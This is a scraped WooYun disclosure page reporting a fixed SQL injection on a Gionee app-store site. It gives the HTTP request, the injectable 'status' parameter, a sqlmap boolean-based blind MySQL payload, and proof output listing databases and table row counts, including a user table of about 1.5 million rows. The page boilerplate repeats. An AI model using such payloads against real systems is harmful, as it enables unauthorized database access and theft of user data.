金立某站SQL注射漏洞 | wooyun-2016-0169017| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169017

漏洞标题：金立某站SQL注射漏洞

漏洞作者：路人甲

提交时间：2016-01-11 09:19

修复时间：2016-01-13 15:30

公开时间：2016-01-13 15:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-11：细节已通知厂商并且等待厂商处理中
2016-01-11：厂商已经确认，细节仅向厂商公开
2016-01-13：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

金立某站SQL注射漏洞

详细说明：

看见首页有了一个不知道重复没有
需要登录

GET /application?keywords=1&status=8 HTTP/1.1
Host: dev.anzhuoapk.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: Hm_lvt_eac5031a4265d98af4563220293c8e47=1452442849; PHPSESSID=6qbdmf3di9ld2889mbt82akle5; Hm_lpvt_eac5031a4265d98af4563220293c8e47=1452454037
Connection: keep-alive

---
Parameter: status (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: keywords=1&status=(SELECT (CASE WHEN (3198=3198) THEN 3198 ELSE 3198*(SELECT 3198 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web application technology: Nginx, PHP 5.3.16
back-end DBMS: MySQL 5.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: status (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: keywords=1&status=(SELECT (CASE WHEN (3198=3198) THEN 3198 ELSE 3198*(SELECT 3198 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---

漏洞证明：

available databases [13]:
[*] `#mysql50#lost+found`
[*] abc
[*] aorausermanagerdb
[*] att
[*] att_2
[*] comment
[*] dw_market_king
[*] information_schema
[*] market_king
[*] mysql
[*] pad_market
[*] performance_schema
[*] test

150W用户信息

Database: aorausermanagerdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| aouserlistinfo | 1512090 |
| aouserlist     | 1512084 |
| sendsmslog     | 347364  |
| validatekey    | 22817   |
| tbl_smsendtask | 21901   |
| aouserfriend   | 7635    |
| citylist       | 2422    |
| nofindprovinfo | 146     |
| operlog        | 66      |
| tbcontrolword  | 45      |
| tbl_smreceived | 9       |
| cpuserlist     | 4       |
+----------------+---------+

current-db

Database: market_king
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| point_account                 | 21861847 |
| data_down_catalog             | 21861162 |
| point_account_0925            | 17385262 |
| point_summary                 | 12972838 |
| dvp_app_stats                 | 7693780 |
| lottery_history               | 7011286 |
| point_signin                  | 4938871 |
| point_download_list           | 4066776 |
| soft_gifts_items              | 736780  |
| soft_tongbup_back             | 720728  |
| comment                       | 580683  |
| soft_thumb_0925               | 481135  |
| soft_tongbup_yingyongbao_copy | 362032  |
| soft_questionnaire_answer     | 351784  |
| iptable                       | 349301  |
| point_record                  | 345752  |
| soft_tongbup_wandoujia        | 270575  |
| dvp_app_screenshot            | 267346  |
| point_exp_record              | 241785  |
| message_center                | 240429  |
| free_call_record              | 238018  |
| soft_fota                     | 237916  |
| free_call_vcode               | 204724  |
| soft_tongbup_360              | 200308  |
| posts_comment                 | 190717  |
| soft_lx_praise                | 147066  |
| soft_thumb                    | 146914  |
| install_log_cnt               | 141356  |
| data_catalog_score_history    | 137000  |
| other_comment                 | 128762  |
| soft_search_content           | 125518  |
| soft_scan                     | 116050  |
| soft_tongbup_yingyongbao      | 112074  |
| install_pkg_cnt               | 107098  |
| soft_gionee_stats             | 101168  |
| soft_tongbup_haitun           | 95095   |
| soft_scan_haitun              | 93525   |
| free_call_phone               | 90237   |
| fc_give_min                   | 90127   |
| soft_new_icon_hl              | 89836   |
| favourite                     | 88657   |
| activity_userinfo             | 87221   |
| soft_test                     | 83853   |
| soft_responsible              | 70546   |
| data_special_score_history    | 68500   |
| soft_note                     | 66579   |
| bug                           | 65948   |
| soft_360_apk                  | 65670   |
| soft_scan_dvp                 | 65347   |
| dvp_application               | 64915   |
| data_soar_score_history       | 63147   |
| data_games_score_history      | 62790   |
| soft_tongbup_yingyongbao_pkg  | 62498   |
| forum_posts                   | 55737   |
| soft_le_xiang_shenhe          | 54352   |
| soft_apk_tmp                  | 53999   |
| soft_new_icon                 | 52432   |
| point_score_record            | 50319   |
| soft_tongbup_baidu_new        | 44869   |
| soft_test_log                 | 42702   |
| soft_copy                     | 40734   |
| soft                          | 40338   |
| model_adapter                 | 39689   |
| soft_att                      | 39175   |
| mr_soft_search_db             | 36627   |
| soft_search_db                | 36627   |
| soft_questionnaire_history    | 36301   |
| data_soft_download            | 35915   |
| soft_md5                      | 35820   |
| soft_temp                     | 33922   |
| data_search_rank              | 33336   |
| upgrade                       | 30776   |
| data_tuijian_cp               | 30247   |
| soft_le_xiang                 | 29177   |
| soft_tongbup_wandoujia_apk    | 25025   |
| forum_posts_img               | 23939   |
| activity_lucky                | 23057   |
| dvp_developer                 | 21992   |
| model_adapter_bak1010         | 21930   |
| dvp_developer20151224         | 21597   |
| dvp_mail_verify               | 21098   |
| soft_apkinfo                  | 20827   |
| game_attributes               | 20506   |
| game_soft_view                | 20506   |
| soft_yyhui_code               | 18099   |
| san_comment                   | 17914   |
| soft_tongbup                  | 17707   |
| special_schedule              | 12927   |
| userdownload                  | 10000   |
| account_add_score_list        | 9092    |
| t_lili_book_rank              | 8058    |
| t_lili_book_special           | 8058    |
| point_account_addres          | 7530    |
| soft_lx_comment               | 7005    |
| point_download_list_update    | 6099    |
| le_xiang_img                  | 5166    |
| soft_tongbup_youxidating      | 5164    |
| t_lili_app_rank               | 5125    |
| t_lili_app_rank_catalog       | 5045    |
| package_special               | 5039    |
| soft_hot                      | 5000    |
| shoufei                       | 4646    |
| game_lottery_history          | 4380    |
| dvp_app_auto_business         | 4339    |
| data_fine_game_score          | 4211    |
| TB_DEVELOPER_SOFTTHUMB        | 4045    |
| data_soar_score               | 4018    |
| game_point_signin             | 3734    |
| dvp_inside_msg                | 3717    |
| soft_9u_games                 | 3168    |
| soft_search                   | 3017    |
| game_point_account            | 2990    |
| manual_operation_soft         | 2830    |
| app_special                   | 2725    |
| gn_catalog_list               | 2242    |
| yyh_posts_del_record          | 2083    |
| search_adp                    | 2000    |
| dvp_app_shoufa                | 1987    |
| soft_youxidating              | 1741    |
| temp_s                        | 1535    |
| TB_DEVELOPERSOFT              | 1450    |
| game_data_special             | 1392    |
| data_soft_top2000             | 1379    |
| dvp_app_off                   | 1306    |
| soft_tongbup_zuimeiyingyong   | 1286    |
| marker_act_candidate          | 1246    |
| tbl_affectedrecord            | 1220    |
| statics                       | 1171    |
| szips                         | 1094    |
| dvp_app_claim                 | 1075    |
| data_fine_app_score           | 1033    |
| data_soft_top1000             | 1000    |
| data_soft_name                | 999     |
| soft_book                     | 999     |
| data_fine_app                 | 969     |
| dvp_app_guanfang              | 957     |
| cp                            | 879     |
| dvp_app_shoufa_copy           | 871     |
| cache                         | 843     |
| data_soft_gain                | 836     |
| game_point_download_list      | 795     |
| special_score                 | 735     |
| dvp_reset_pwd                 | 687     |
| ceshi_status                  | 644     |
| channel_first                 | 635     |
| channel_last                  | 635     |
| soft_9u_task                  | 576     |
| soft_activity                 | 568     |
| soft_up                       | 550     |
| Monitor_MarketApp_VS          | 544     |
| soft_tag_apps                 | 514     |
| soft_thumb_null               | 463     |
| forum_feed_back               | 452     |
| `catalog`                     | 446     |
| soft_praise                   | 435     |
| TB_DEVELOPER                  | 413     |
| chart_score                   | 401     |
| wochacha_item                 | 401     |
| data_soar                     | 400     |
| ceshi_report                  | 398     |
| point_download_illegal        | 396     |
| game_city                     | 381     |
| fine_game_schedule            | 361     |
| catalog_stat                  | 357     |
| catalog0801                   | 353     |
| soft_gifts_content            | 346     |
| soft_commodity_screenshot     | 341     |
| soft_gifts                    | 302     |
| dvp_app_famous                | 273     |
| soft_wake_up                  | 273     |
| special_note                  | 261     |
| point_blacklist               | 242     |
| search_key                    | 230     |
| game_verify_code              | 209     |
| data_fine_games               | 200     |
| data_fine_games_copy          | 200     |
| hot_keyword                   | 200     |
| search                        | 200     |
| soft_le_xiang_content         | 191     |
| chart_score_catalog           | 186     |
| soft_commodity                | 163     |
| dvp_app_shoufa_disableddates  | 157     |
| book_special_soft             | 156     |
| game_data_rank                | 146     |
| game_date_package_special     | 146     |
| soft_famous                   | 146     |
| game_special_score            | 144     |
| dvp_app_activity              | 143     |
| device_my                     | 126     |
| fine_app_schedule             | 119     |
| soft_anzhi_games              | 112     |
| soft_thumb_null_aa            | 111     |
| game_date_package_console     | 109     |
| search_key_word               | 109     |
| package_web                   | 103     |
| forum_records                 | 102     |
| game_comment                  | 101     |
| data_fun_cp                   | 100     |
| soft_day_download_rank        | 100     |
| t_lili_rank_list              | 100     |
| soft_evaluation_content       | 94      |
| dvp_download_task             | 87      |
| hot_keyword_input             | 83      |
| soft_questionnaire_details    | 79      |
| special_book_score            | 77      |
| game_point_order              | 76      |
| catalog_soft_commend          | 66      |
| sneer                         | 65      |
| soft_le_xiang_yulan           | 63      |
| blacklist                     | 56      |
| index_recommend               | 56      |
| game_hot_keyword_input        | 55      |
| search_my                     | 52      |
| soft_series_install           | 52      |
| soft_tag                      | 52      |
| game_data_hot_keyword         | 50      |
| t_lili_book_keyword           | 50      |
| bbs_user                      | 49      |
| necessary_play                | 49      |
| gionee_evaluation_content     | 48      |
| activity_prize                | 44      |
| soft_thumb_update             | 44      |
| soft_zjbb                     | 42      |
| tempp                         | 42      |
| users                         | 36      |
| game_date_package_online      | 35      |
| point_le_xiang                | 35      |
| soft_questionnaire_exams      | 35      |
| sdk_account_rank              | 34      |
| soft_video                    | 33      |
| game_province                 | 32      |
| gomarket_ad_soft              | 32      |
| soft_dock_task                | 32      |
| soft_360_apk_category         | 29      |
| soft_search_filter_keyword    | 27      |
| hot_keyword_book_input        | 25      |
| yyh_shutup_account            | 25      |
| dvp_actblt                    | 24      |
| gn_catalog                    | 24      |
| game_point                    | 23      |
| game_commodity_screenshot     | 22      |
| dvp_app_remark                | 21      |
| soft_series_cps               | 21      |
| soft_source                   | 21      |
| app_act_web                   | 20      |
| dvp_news                      | 20      |
| huati                         | 20      |
| soft_evaluation               | 19      |
| dvp_app_coomodel              | 18      |
| gomarket_ad_soft_v4           | 17      |
| game_bug                      | 16      |
| gomarket_ad_game              | 16      |
| soft_questionnaire            | 16      |
| data_point                    | 15      |
| device_platform               | 14      |
| gionee_evaluation             | 14      |
| widget                        | 14      |
| catalog_zjbb                  | 13      |
| perk_key_words                | 13      |
| dvp_app_sreen_size            | 12      |
| dvp_app_stats_att             | 12      |
| gomarket_ad_banner            | 12      |
| book_special                  | 11      |
| dvp_app_catalog               | 11      |
| soft_experience               | 11      |
| special_book_free_score       | 11      |
| catalog_play                  | 10      |
| colour                        | 10      |
| dvp_app_language              | 10      |
| font                          | 10      |
| gomarket_ad_book              | 10      |
| dvp_activity_status           | 9       |
| dvp_app_chipset_ver           | 9       |
| dvp_app_markets               | 9       |
| soft_experience_task          | 9       |
| tbl_app_info                  | 9       |
| game_ad_catalog               | 8       |
| lottery                       | 8       |
| recommend_master              | 8       |
| sdk_pay                       | 8       |
| skin                          | 8       |
| subgame_sim                   | 7       |
| TB_WAPDOWNMODEL               | 7       |
| chart_score_book              | 6       |
| dvp_app_activity_dates        | 6       |
| dvp_news_catalog              | 6       |
| game_announcement             | 6       |
| lottery_data                  | 6       |
| apk_banner                    | 5       |
| dvp_submodule                 | 5       |
| game_ad                       | 5       |
| game_lottery_data             | 5       |
| game_point_sign_setting       | 5       |
| soft_yyhui                    | 5       |
| dvp_cash_withdraw             | 4       |
| forum                         | 4       |
| game_commodity                | 4       |
| scankey                       | 4       |
| special_items                 | 4       |
| act_web                       | 3       |
| chl_user                      | 3       |
| data_book_free_special        | 3       |
| dvp_app_shoufa_noapk          | 3       |
| fc_add_min_list               | 3       |
| filter_key_word               | 3       |
| game_lottery_image            | 3       |
| lottery_image                 | 3       |
| operator                      | 3       |
| point_sign_setting            | 3       |
| soft_gamecenter_ad            | 3       |
| t_lili_rank_weight            | 3       |
| activity_sim                  | 2       |
| aora_soft                     | 2       |
| dvp_activity_catalog          | 2       |
| dvp_app_OS                    | 2       |
| dvp_app_os                    | 2       |
| sdk_cash_pay                  | 2       |
| soft_hj                       | 2       |
| `widget--`                    | 1       |
| dvp_module                    | 1       |
| dvp_sysconfig                 | 1       |
| fc_set_lt_list                | 1       |
| game_load                     | 1       |
| lottery_auto_increment        | 1       |
| market                        | 1       |
| market_load                   | 1       |
| phone_series                  | 1       |
| sdk_recharge                  | 1       |
| soft_home_below_ad            | 1       |
| soft_resource                 | 1       |
| soft_series                   | 1       |
| special_ad                    | 1       |
| subject_content               | 1       |
+-------------------------------+---------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-01-11 12:22

厂商回复：

谢谢。2016-01-10 Dleo已经提交过相关漏洞。感谢2位。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169017

漏洞标题：金立某站SQL注射漏洞

相关厂商：gionee.com

漏洞作者：路人甲

提交时间：2016-01-11 09:19

修复时间：2016-01-13 15:30

公开时间：2016-01-13 15:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0169017

漏洞标题：金立某站SQL注射漏洞

相关厂商：gionee.com

漏洞作者： 路人甲

提交时间：2016-01-11 09:19

修复时间：2016-01-13 15:30

公开时间：2016-01-13 15:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0169017"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云